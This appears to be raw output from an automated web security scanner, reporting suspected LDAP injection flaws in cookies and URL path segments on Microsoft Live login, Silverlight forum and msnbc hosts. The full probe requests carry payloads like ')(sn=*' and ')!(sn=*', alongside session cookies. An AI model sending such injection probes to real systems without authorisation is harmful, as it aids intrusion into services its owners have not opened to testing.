HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 72837 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 10:40:01 GMT; expires=Mon, 30-Jan-2012 15:40:01 GMT; path=/ Set-Cookie: ASP.NET_SessionId=0uiuc355vxi0jo55duaqdi45; path=/; HttpOnly Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:00:01 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 15:40:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
GET /forums/53.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=c9aa3c72e7b4fb27)!(sn=*;
Response 2
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 72821 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 10:40:02 GMT; expires=Mon, 30-Jan-2012 15:40:02 GMT; path=/ Set-Cookie: ASP.NET_SessionId=3vu44r55bgcoj055yau41u45; path=/; HttpOnly Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:00:02 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 15:40:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The MUID cookie appears to be vulnerable to LDAP injection attacks.
The payloads 6d0cc50644fe129b)(sn=* and 6d0cc50644fe129b)!(sn=* were each submitted in the MUID cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1253879194&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=1033&id=64855&mkt=en-us HTTP/1.1 Host: login.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296343067&co=1&id=265631; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=6d0cc50644fe129b)(sn=*; wla42=;
Response 1
HTTP/1.1 200 OK Connection: close Date: Sat, 29 Jan 2011 23:49:13 GMT Server: Microsoft-IIS/6.0 PPServer: PPV: 30 H: BAYIDSLGN1H41 V: 0 Content-Type: text/html; charset=utf-8 Expires: Sat, 29 Jan 2011 23:48:13 GMT Cache-Control: no-cache Pragma: no-cache P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" X-XSS-Protection: 0 Set-Cookie: MSPRequ=lt=1296344953&id=64855&co=1; path=/;version=1 Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1$uuid-034b40c0-ec4a-47dc-9c86-914ce0846e13; path=/;version=1 X-Frame-Options: deny Content-Length: 13617
The wla42 cookie appears to be vulnerable to LDAP injection attacks.
The payloads d0b6de928a1638d)(sn=* and d0b6de928a1638d)!(sn=* were each submitted in the wla42 cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /ppsecure/secure.srf?wa=wsignin1.0&rpsnv=11&ct=1296343045&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&id=265631&wa=wsignin1.0&rpsnv=11&ct=1296343045&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&id=265631&vv=900&mkt=EN-US&lc=1033&bk=1296343067 HTTP/1.1 Host: login.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296343067&co=1&id=265631; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=d0b6de928a1638d)(sn=*;
Response 1
HTTP/1.1 200 OK Connection: close Date: Sat, 29 Jan 2011 23:34:02 GMT Server: Microsoft-IIS/6.0 PPServer: PPV: 30 H: BAYIDSLGN1I49 V: 0 Content-Type: text/html; charset=utf-8 Expires: Sat, 29 Jan 2011 23:33:02 GMT Cache-Control: no-cache Pragma: no-cache P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" X-XSS-Protection: 0 Set-Cookie: MSPRequ=lt=1296344042&id=265631&co=1; path=/;version=1 Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1$uuid-2f091b46-7c65-4a52-bf38-2a5801acd6e1; path=/;version=1 X-Frame-Options: deny Content-Length: 17632
The REST URL parameter 4 appears to be vulnerable to LDAP injection attacks.
The payloads ad5b7d32bfbc5f43)(sn=* and ad5b7d32bfbc5f43)!(sn=* were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001 HTTP/1.1 Host: photoblog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sat, 29 Jan 2011 23:51:17 GMT Content-Length: 28340 Connection: close
GET /_news/2011/01/ad5b7d32bfbc5f43)!(sn=*/5942494-double-whammy-on-the-sun?gt1=43001 HTTP/1.1 Host: photoblog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sat, 29 Jan 2011 23:51:17 GMT Content-Length: 28330 Connection: close
The REST URL parameter 3 appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 01:26:47 GMT Connection: close Vary: Accept-Encoding Content-Length: 28622
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 01:26:48 GMT Connection: close Vary: Accept-Encoding Content-Length: 28632
The GetSAd parameter appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the GetSAd parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
The REST URL parameter 2 appears to be vulnerable to LDAP injection attacks.
The payloads 567e2b3ee4443fce)(sn=* and 567e2b3ee4443fce)!(sn=* were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /_news/567e2b3ee4443fce)(sn=*/08/19/4932582-cameron-diaz-most-dangerous-celeb-search-name HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:35:49 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39911
GET /_news/567e2b3ee4443fce)!(sn=*/08/19/4932582-cameron-diaz-most-dangerous-celeb-search-name HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:35:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39901
The REST URL parameter 4 appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /_news/2010/08/*)(sn=*/4961720-yahoo-search-results-are-now-coming-from-bing- HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:32:11 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39901
GET /_news/2010/08/*)!(sn=*/4961720-yahoo-search-results-are-now-coming-from-bing- HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:32:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39911
The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.
The payloads 67c3b1d04dfaf8d4)(sn=* and 67c3b1d04dfaf8d4)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /67c3b1d04dfaf8d4)(sn=*/2010/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:25:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39901
GET /67c3b1d04dfaf8d4)!(sn=*/2010/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:25:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39911
The REST URL parameter 5 appears to be vulnerable to LDAP injection attacks.
The payloads 712d97ecb1068be9)(sn=* and 712d97ecb1068be9)!(sn=* were each submitted in the REST URL parameter 5. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /_news/2011/01/27/712d97ecb1068be9)(sn=* HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:31:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39911
GET /_news/2011/01/27/712d97ecb1068be9)!(sn=* HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:31:24 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39901
The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /*)(sn=*/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/?GT1=43001 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 01:53:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39901
GET /*)!(sn=*/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/?GT1=43001 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 01:53:57 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39911
The REST URL parameter 5 appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 5. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /_news/2011/01/28/*)(sn=*/?GT1=43001 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sat, 29 Jan 2011 23:54:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39911
GET /_news/2011/01/28/*)!(sn=*/?GT1=43001 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sat, 29 Jan 2011 23:54:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39901
The REST URL parameter 3 appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 01:25:05 GMT Connection: close Vary: Accept-Encoding Content-Length: 40123
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 01:25:06 GMT Connection: close Vary: Accept-Encoding Content-Length: 40105
The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.
The payloads 1f4e07eeaa6b77c9)(sn=* and 1f4e07eeaa6b77c9)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /1f4e07eeaa6b77c9)(sn=*/32359544/ HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET X-Cnection: close Content-Length: 1245 Date: Sun, 30 Jan 2011 03:10:32 GMT Connection: close Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html>
Request 2
GET /1f4e07eeaa6b77c9)!(sn=*/32359544/ HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 03:10:32 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 99408
<html xmlns:tvservices="http://www.msnbc.com"><head><title>Page not found - About- msnbc.com</title><link rel="stylesheet" type="text/css" href="/css/html40.css" /><link rel="stylesheet" type="text/css" href="/default.ashx/id/21589549" /><link rel="stylesheet" type="text/css" href="/default.ashx/id/21731378" /><script type="text/javascript" src="/js/std.js"></script><script type="text/javascript" src="/id/23149822"></script><script type="text/javascript">gEnabled=false;</script><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta http-equiv="pics-label" content="(pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.msnbc.redacted" r (nz 1vz 1lz 1oz 1cz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.msnbc.redacted" r (l 0n 0s 0v 0))"><meta name="robots" content="noindex"><meta name="description" content="Error 404"><meta name="Search.Document" content="story"><meta name="Search.Title" content="We cannot find the page you requested."><meta name="Search.Updated" content="Thu, 11 Mar 2010 22:11:14 GMT"><meta name="Search.Expires" content="Fri, 31 Dec 9999 23:59:59 GMT"><meta name="GOOGLEBOT" content="unavailable_after: 31-Dec-9999 23:59:59 GMT"><meta name="Search.Section" content="About"><link rel="alternate" type="application/rss+xml" title="MSNBC - Top msnbc.com headlines" 